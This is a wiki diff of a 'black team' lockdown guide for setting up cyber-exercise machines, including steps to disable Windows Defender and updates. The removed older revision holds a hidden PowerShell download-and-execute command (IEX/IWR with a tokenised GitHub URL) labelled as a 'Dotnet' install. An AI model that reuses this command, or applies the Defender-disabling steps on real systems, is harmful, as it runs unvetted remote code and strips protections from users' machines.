guides:lockdown_black_team

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision
Previous revision
Next revision Both sides next revision
guides:lockdown_black_team [2019/12/19 04:44]
aibekzhy Swappiness
guides:lockdown_black_team [2020/02/05 20:02]
aibekzhy
Line 18: Line 18:
     - Copy Paste Enabled     - Copy Paste Enabled
     - Graphics to support Full HD/​Automatic Graphics Detection     - Graphics to support Full HD/​Automatic Graphics Detection
 +    - Ensure time Synchronized
 +    - Potentially disable DHCP
  
   * Linux:   * Linux:
Line 37: Line 39:
     - Ensure that Windows Remote Management service is started Automatically     - Ensure that Windows Remote Management service is started Automatically
     - Enable Ping via Firewall (Allow ICMP Packets)     - Enable Ping via Firewall (Allow ICMP Packets)
-    - Disable Windows Defender (Registry/​GPO)+    - Disable/​Uninstall ​Windows Defender (Registry/​GPO)
     - Disable Windows Updates (Registry/​GPO/​Services)     - Disable Windows Updates (Registry/​GPO/​Services)
     - Ensure Sleep is disabled     - Ensure Sleep is disabled
Line 66: Line 68:
  
 Things that are typically requested: Things that are typically requested:
-  * Windows: Dotnet ​(powershell.exe -Sta -Nop -w hidden -Command "​IEX(IWR 'https://raw.githubusercontent.com/NotoriousRebel/​temppp/​master/​builder.ps1?​token=AIVA5C62REQKCZAXPVLPOUS5TAWXC'​ -UseBasicParsing)"​)+  * Windows: Dotnet https://dotnet.microsoft.com/download
   * C2 Servers   * C2 Servers
 ===== Naming Conventions ===== ===== Naming Conventions =====
  • guides/lockdown_black_team.txt
  • Last modified: 2021/04/27 02:57
  • by aibekzhy